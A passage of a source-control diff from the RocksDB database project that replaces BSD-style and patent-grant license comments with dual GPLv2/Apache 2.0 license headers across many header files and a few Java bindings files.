--- a/include/rocksdb/thread_status.h
+++ b/include/rocksdb/thread_status.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file defines the structures for exposing run-time status of any
 // rocksdb-related thread. Such run-time status can be obtained via
diff --git a/include/rocksdb/threadpool.h b/include/rocksdb/threadpool.h
index 3711276d853..e871ee18c7a 100644
--- a/include/rocksdb/threadpool.h
+++ b/include/rocksdb/threadpool.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/include/rocksdb/transaction_log.h b/include/rocksdb/transaction_log.h
index 1fb93ace16e..7fc46ae2645 100644
--- a/include/rocksdb/transaction_log.h
+++ b/include/rocksdb/transaction_log.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
 #define STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_
diff --git a/include/rocksdb/types.h b/include/rocksdb/types.h
index 6a477cab89e..106ac2f76bf 100644
--- a/include/rocksdb/types.h
+++ b/include/rocksdb/types.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef STORAGE_ROCKSDB_INCLUDE_TYPES_H_
 #define STORAGE_ROCKSDB_INCLUDE_TYPES_H_
diff --git a/include/rocksdb/universal_compaction.h b/include/rocksdb/universal_compaction.h
index d22b7c1d12d..ed2220873cd 100644
--- a/include/rocksdb/universal_compaction.h
+++ b/include/rocksdb/universal_compaction.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
 #define STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H
diff --git a/include/rocksdb/utilities/backupable_db.h b/include/rocksdb/utilities/backupable_db.h
index 7eae157752d..fc2b6ba43f7 100644
--- a/include/rocksdb/utilities/backupable_db.h
+++ b/include/rocksdb/utilities/backupable_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/include/rocksdb/utilities/checkpoint.h b/include/rocksdb/utilities/checkpoint.h
index b6e0e169a04..aa0a394d4d0 100644
--- a/include/rocksdb/utilities/checkpoint.h
+++ b/include/rocksdb/utilities/checkpoint.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // A checkpoint is an openable snapshot of a database at a point in time.
diff --git a/include/rocksdb/utilities/convenience.h b/include/rocksdb/utilities/convenience.h
index b0ac15c6dfd..f61afd69ef8 100644
--- a/include/rocksdb/utilities/convenience.h
+++ b/include/rocksdb/utilities/convenience.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/date_tiered_db.h b/include/rocksdb/utilities/date_tiered_db.h
index 1db642776b3..f259b05a8ae 100644
--- a/include/rocksdb/utilities/date_tiered_db.h
+++ b/include/rocksdb/utilities/date_tiered_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/db_ttl.h b/include/rocksdb/utilities/db_ttl.h
index 1f65bd4a284..7c9c0cc55a6 100644
--- a/include/rocksdb/utilities/db_ttl.h
+++ b/include/rocksdb/utilities/db_ttl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/debug.h b/include/rocksdb/utilities/debug.h
index 1ef52c1025a..f29fa045cba 100644
--- a/include/rocksdb/utilities/debug.h
+++ b/include/rocksdb/utilities/debug.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This source code is also licensed under the GPLv2 license found in the
 // COPYING file in the root directory of this source tree.
diff --git a/include/rocksdb/utilities/document_db.h b/include/rocksdb/utilities/document_db.h
index 45ee87da3e4..3668a50b9d2 100644
--- a/include/rocksdb/utilities/document_db.h
+++ b/include/rocksdb/utilities/document_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/env_librados.h b/include/rocksdb/utilities/env_librados.h
index a3db0e30d6b..272365f0c64 100644
--- a/include/rocksdb/utilities/env_librados.h
+++ b/include/rocksdb/utilities/env_librados.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_UTILITIES_ENV_LIBRADOS_H
 #define ROCKSDB_UTILITIES_ENV_LIBRADOS_H
diff --git a/include/rocksdb/utilities/env_mirror.h b/include/rocksdb/utilities/env_mirror.h
index e0ead08a843..ffd175ae5e6 100644
--- a/include/rocksdb/utilities/env_mirror.h
+++ b/include/rocksdb/utilities/env_mirror.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2015, Red Hat, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/utilities/geo_db.h b/include/rocksdb/utilities/geo_db.h
index 46034131d7a..408774c5990 100644
--- a/include/rocksdb/utilities/geo_db.h
+++ b/include/rocksdb/utilities/geo_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/info_log_finder.h b/include/rocksdb/utilities/info_log_finder.h
index 4b7530c28ba..6df056ffae8 100644
--- a/include/rocksdb/utilities/info_log_finder.h
+++ b/include/rocksdb/utilities/info_log_finder.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/json_document.h b/include/rocksdb/utilities/json_document.h
index f35ae1a3567..5d841f95155 100644
--- a/include/rocksdb/utilities/json_document.h
+++ b/include/rocksdb/utilities/json_document.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/ldb_cmd.h b/include/rocksdb/utilities/ldb_cmd.h
index 56fed19b830..b9eb1035fb2 100644
--- a/include/rocksdb/utilities/ldb_cmd.h
+++ b/include/rocksdb/utilities/ldb_cmd.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/include/rocksdb/utilities/ldb_cmd_execute_result.h b/include/rocksdb/utilities/ldb_cmd_execute_result.h
index 35e01bdb18f..5ddc6feb696 100644
--- a/include/rocksdb/utilities/ldb_cmd_execute_result.h
+++ b/include/rocksdb/utilities/ldb_cmd_execute_result.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/include/rocksdb/utilities/leveldb_options.h b/include/rocksdb/utilities/leveldb_options.h
index 09dff48ea24..fb5a440bbc6 100644
--- a/include/rocksdb/utilities/leveldb_options.h
+++ b/include/rocksdb/utilities/leveldb_options.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h b/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
index 825a29a5856..a7af592d8c5 100644
--- a/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
+++ b/include/rocksdb/utilities/lua/rocks_lua_compaction_filter.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2016, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/lua/rocks_lua_custom_library.h b/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
index ffe2837f53b..3ca8b32f3e2 100644
--- a/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
+++ b/include/rocksdb/utilities/lua/rocks_lua_custom_library.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2016, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifdef LUA
diff --git a/include/rocksdb/utilities/lua/rocks_lua_util.h b/include/rocksdb/utilities/lua/rocks_lua_util.h
index f3637a29b4e..36b007cc73c 100644
--- a/include/rocksdb/utilities/lua/rocks_lua_util.h
+++ b/include/rocksdb/utilities/lua/rocks_lua_util.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2016, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 // lua headers
diff --git a/include/rocksdb/utilities/memory_util.h b/include/rocksdb/utilities/memory_util.h
index d89bb6adc41..c6128909e90 100644
--- a/include/rocksdb/utilities/memory_util.h
+++ b/include/rocksdb/utilities/memory_util.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/object_registry.h b/include/rocksdb/utilities/object_registry.h
index 4d12fc14b03..b046ba7c1f5 100644
--- a/include/rocksdb/utilities/object_registry.h
+++ b/include/rocksdb/utilities/object_registry.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/optimistic_transaction_db.h b/include/rocksdb/utilities/optimistic_transaction_db.h
index 271905d0d56..02917ff5830 100644
--- a/include/rocksdb/utilities/optimistic_transaction_db.h
+++ b/include/rocksdb/utilities/optimistic_transaction_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/option_change_migration.h b/include/rocksdb/utilities/option_change_migration.h
index 236f1311f35..81f674c9737 100644
--- a/include/rocksdb/utilities/option_change_migration.h
+++ b/include/rocksdb/utilities/option_change_migration.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/options_util.h b/include/rocksdb/utilities/options_util.h
index 04ab0e39c15..d02c574104a 100644
--- a/include/rocksdb/utilities/options_util.h
+++ b/include/rocksdb/utilities/options_util.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // This file contains utility functions for RocksDB Options.
 #pragma once
diff --git a/include/rocksdb/utilities/sim_cache.h b/include/rocksdb/utilities/sim_cache.h
index a8581bf2b10..60c73ec5d50 100644
--- a/include/rocksdb/utilities/sim_cache.h
+++ b/include/rocksdb/utilities/sim_cache.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/spatial_db.h b/include/rocksdb/utilities/spatial_db.h
index aa33afcbd0b..477b77cf626 100644
--- a/include/rocksdb/utilities/spatial_db.h
+++ b/include/rocksdb/utilities/spatial_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/table_properties_collectors.h b/include/rocksdb/utilities/table_properties_collectors.h
index b7a57d70d16..0f8827037b2 100644
--- a/include/rocksdb/utilities/table_properties_collectors.h
+++ b/include/rocksdb/utilities/table_properties_collectors.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h
index 92d33739ba2..8507ef133fb 100644
--- a/include/rocksdb/utilities/transaction.h
+++ b/include/rocksdb/utilities/transaction.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h
index e14f9e06db1..259f50fe6a6 100644
--- a/include/rocksdb/utilities/transaction_db.h
+++ b/include/rocksdb/utilities/transaction_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/transaction_db_mutex.h b/include/rocksdb/utilities/transaction_db_mutex.h
index ea35d911c04..df59e7a9e5b 100644
--- a/include/rocksdb/utilities/transaction_db_mutex.h
+++ b/include/rocksdb/utilities/transaction_db_mutex.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/include/rocksdb/utilities/write_batch_with_index.h b/include/rocksdb/utilities/write_batch_with_index.h
index f429610c414..38809e1c781 100644
--- a/include/rocksdb/utilities/write_batch_with_index.h
+++ b/include/rocksdb/utilities/write_batch_with_index.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h
index eb1ce2ee16a..fb920cf2e7e 100644
--- a/include/rocksdb/version.h
+++ b/include/rocksdb/version.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #define ROCKSDB_MAJOR 5
diff --git a/include/rocksdb/wal_filter.h b/include/rocksdb/wal_filter.h
index 131fe87e7ce..686fa499893 100644
--- a/include/rocksdb/wal_filter.h
+++ b/include/rocksdb/wal_filter.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/include/rocksdb/write_batch.h b/include/rocksdb/write_batch.h
index 432a7c19bbb..8bd93d36c4e 100644
--- a/include/rocksdb/write_batch.h
+++ b/include/rocksdb/write_batch.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/write_batch_base.h b/include/rocksdb/write_batch_base.h
index f1fe754b116..3e6d011bd59 100644
--- a/include/rocksdb/write_batch_base.h
+++ b/include/rocksdb/write_batch_base.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/include/rocksdb/write_buffer_manager.h b/include/rocksdb/write_buffer_manager.h
index 185e8baf97b..856cf4b2463 100644
--- a/include/rocksdb/write_buffer_manager.h
+++ b/include/rocksdb/write_buffer_manager.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java b/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
index 899a791988a..8af6d2edfb8 100644
--- a/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
+++ b/java/benchmark/src/main/java/org/rocksdb/benchmark/DbBenchmark.java
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 /**
  * Copyright (C) 2011 the original author or authors.
  * See the notice.md file distributed with this work for additional
diff --git a/java/rocksjni/backupablejni.cc b/java/rocksjni/backupablejni.cc
index 6da4575a108..28db2b0210a 100644
--- a/java/rocksjni/backupablejni.cc
+++ b/java/rocksjni/backupablejni.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
